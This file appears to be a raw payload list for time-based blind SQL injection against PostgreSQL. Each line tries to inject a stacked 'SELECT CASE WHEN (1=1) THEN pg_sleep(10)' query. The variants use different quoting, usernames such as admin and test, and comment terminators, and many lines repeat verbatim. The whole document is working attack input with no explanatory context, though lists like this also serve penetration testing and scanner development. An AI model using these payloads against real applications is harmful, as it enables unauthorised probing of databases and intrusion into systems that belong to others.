; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
user"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
user"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
user"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
user"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
user"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
user"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
user"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
admin"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
admin"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
admin"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
admin"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
admin"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
admin"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
admin"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
adam"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
adam"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
adam"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
adam"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
adam"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
adam"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
adam"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
test"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
test"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
test"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
test"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
test"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
test"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
test"; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
user'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
user'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
user'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
user'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
user'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
user'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
user'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
admin'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
admin'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
admin'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
admin'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
admin'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
admin'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
admin'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
adam'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
adam'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
adam'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
adam'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
adam'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
adam'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
adam'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
test'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
test'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
test'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
test'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
test'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
test'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
test'; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
user; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
user; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
user; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
user; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
user; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
user; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
user; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
admin; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
admin; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
admin; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
admin; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
admin; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
admin; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
admin; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
adam; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
adam; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
adam; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
adam; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
adam; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
adam; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
adam; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
test; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
test; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -;
test; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- -
test; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END#
test; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;
test; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END;#
test; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END/*
